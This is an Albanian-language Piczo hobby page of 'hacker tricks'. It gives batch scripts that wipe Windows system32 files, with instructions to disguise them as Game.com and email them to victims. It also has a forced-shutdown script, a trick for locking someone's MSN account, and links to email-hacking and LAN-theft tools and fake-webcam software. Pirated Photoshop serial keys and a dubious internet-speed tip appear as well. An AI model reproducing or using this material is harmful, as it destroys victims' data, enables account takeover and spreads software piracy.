HTML Free Code
   
  Mire Se Vini
  Programa Per Hakera
 

 Qe Ni trik per me blloku msn ........----- Vetem ne www.genty-xxl.piczo.com   shkon ne webfaqen www.hotmail.com tani ja shkrun emailin qatipersoni ehde shkon te paswordi edhe ja fut A pasvordit edhe enter qashtu nja dy 3 her edhe kur dalin do shkronja ne foto ati ju   ka blloku msn-ja.shpresoj qe kesh i kqart.

nese sbon bone shkronjen A me shkrojn te madhe.  Qe ni trik per me krijue error   1.hapim notepadin
2.e shenojm ket:c =msgbox("kompjoteri juaj esht hackuar".0+16."error")
shkoni save as dhe e runi ne .vbs

e kom provu vet se sa i demshem o per pc....  
Mos e hapeni por vetem dergojav ndonje kuj                                                                                               Mee I hy Dikujt Ne Pc                 merrne downloadone ne speedyshare qito 2 edhe e shini qysh duhet mi perdor oshr e leht


http//www.speedyshare.com/926162409.html]

           http//www.megaupload/?d=0xli74zd Reklamo Web Faqen tuaj ne google ----- Per Me Shti WebFaqen n`Google :http://www.google.com/addurl/?continue=/addurlE Kryni Proceduren Se Qka Duhet Me Plotsu Aty , Edhe Webi Juv Do Te Regjistrohet n`Google ...Per Me Hjek WebFaqen E Juv Prej Google :http://www.google.com/addurl/?continue=/removeedhe tanajjj webi juaj osht i regjsitrum:D Leshoja kameren pa e dit viktima ----Vetem Tek www.genty-xxl.piczo.com--------     Nese keni deshir me i shlu dikuj camer te rrejshme,
Ki program sherben per me i shlu dikujt camer te rrejshme ne msn.
e mer naj video pi ne youtube e converton ne "avi*mpg*data*mpeg*mp2.
kur ta downloadoni mrenda e keni ni video cka e kam xhet un dhe e convertume osht mundeni edhe at me perdor.
dhe e cesl Splitcam/cliko ati ku shkrun Video dhe e shlon ati videon cka e ke dhe ja shlon ne msn cameren te del aj video clipi.
Hajt met mira.
http://rapidshare.com/files/15619900...w.net.rar.html Krijoo Virus ---- Vetem tek ---www.genty-xxl.piczo.com-----   Krijo Virus
Krijo nje Batch Game.bat Lexo tekstinSe pari shko START RUn tani Shenoje ne Run Notepaddhe kopjo ket me posht qe eshte ne kodKodi:@echo offdelete c:winntsystem32*.*delete c:winnt*.*2. Konverto prej Game.bat ne Game.com .Kodi tjeter 2 :attrib -h -r -s "C:windowssystem32*.*"del /q "C:windowssystem32*.*"exitMe keto .bat mundesh me ja fshi krejt filat ne windows dhe mandej smundet me dhez PC-en ma.....Mundesh dhe mi ndrue keto per me ja fshi tjera directory hehehhTung3 .Tani shkoni Ndryshoni Ikonen Game.com me Tast te Djatht Properties Tani4. Dergoni Game.com ne e-mail attachment Naj Viktimes:5. Tani Viktima e hap Programin dhe i Fshihen Gjitha ne Windows Dirketor Fajllat. Largoj errorat nga pc   ----- Edhe stupified largoj eroret nga PC jote
Shiqoje receten
1.Shkoni Te MyComputer
2.Me Tastin E Djatht Klikoni Properties
3.Pastaj shkoni te Advanced
4.Pastaj Shkoni tek "error reporting button"
5.Klikoni Disable error reporting
6.Klikoni OK
7.Klikoni prap OK+_ Krijo Virus Te Rrezikshem ----- 1.Hapim Notepad
2.E Shkruajm Kete:

@echo
msg * System-Coder
shutdown -s -t 60 -c "System-Coder KHG"

3.Dhe E Ruajm SiTeDoni.bat

po menoj naj kujt ne kompjoter me ja ba jo ne te juvin se nuk qelet ma ------ Vetem tek www.genty-xxl.piczo.com---- Adobe Photo Shop Neww !!! me RapidShare http://rapidshare.com/files/86017700/port.rar

me Datenklo http://www.datenklo.net/dl-Z8mCz

Disa serial code ka ta instalojsh

1330-1751-1921-7520-1721-1350 or 1330-1363-7694-4895-1528-1544or 1330-1800-5141-4335-5864-7292 or 1330-1639-1879-7614-0164-0352 or 1330-1313-7694-4895-1528-1598 or 1330-1863-9167-6007-0649-1177 or 1330-1793-3705-2324-5056-2305 or 1330-1455-9505-9239-2041-4849 Si te rrisim shpejtsin e internetit   per 20 %?


Së pari e hapim komanderin "RUN",pasi që të hapet shkruani "gpedit.msc" pa thonjëza.

 

Zgjedhim: Local Computer Policy pastaj Administrative Templates , Network , QoS Packet Scheduler dhe në fund Limit reservable bandwid                                                                                                                                                      

Pasi që të klikoni tek Limit reservable bandwidth hapet kjo dritare :

Kliko Enabled , tash Bandwidth limit(%) ndryshoje nga 20 në 0.

Dhe në fund kliko Apply dhe OK,tash gjithqa është në rregull, dhe interneti juaj është më I shpejtë për 20%.                                                       Vetem Tek wWw.genty-xxl.piczo.com Alarm Ne Pc Kush Hyn Ne Pc Tanen vivuvivuvivuvivuv haahahah           Zone Alarm   valla qit program s kom testu veq pom doket osht met kallzu qdo sen qka bohet n pc-tuaj
Zone AlarmDownload:ftp://194.97.2.69/pub/filepilot/wind...ity/zonealarm/   ------------Vetem ---- Tek----- wWw.genty-xxl.piczo.com ------ Menyra   Per Mi Hackeru E-mail ketu esht nje tutorial jan 8 menyra me te mira per te hackeruar msn email esht nje permbledhje nga interneti ne gjuhen shqipe bashk me vegla ...............


http://rapidshare.com/files/82439309...rf_hacking.rar Qysh Mundesh Me Vjedh Rrjetin Per Mes Lan !!!   Qe qyhs muni me vjedh Rrjet ! LAN

qetu i keni MRENA edhe TXT. tKallxon qysh edhe Programin


http://www.speedyshare.com/846143308.html
                    ----Vetem Tek wWw.genty-xxl.piczo.com HYR ne ket faqe per te hyr ne lojrat e ndryshme >>>>>>>>

www.freegaming.de  
Vetem Tek wWw.genty-xxl.piczo.com            off-screen area
tell me more Switch to New Toolbar  EDIT PAGE
ADD NEW PAGE BACKGROUND ADD PAGE TO ZONE
  ADD STUFF
PICTURES PICZO ZONE GRAPHICS PICZO ZONE CODES PICZO ZONE ICONS RANK BADGE SLIDESHOW MUSIC MUSIC CLIPS VIDEO VIDEO UPLOAD GAMES WIDGETS POLLS TEXT GLITTER GRAPHICS HTML BOX CLIPART
  ADD CONTROLS
RATINGS METER HIT COUNTER PAGE LIST TEXT LIST FRIENDS LIST SHOUTBOX COMMENT BOARD HOME PAGE LINK PAYPAL BUTTON 
  Now rotating picture, please wait...

 
  Byy GenTy  
 
=> Do you also want a homepage for free? Then click here! <=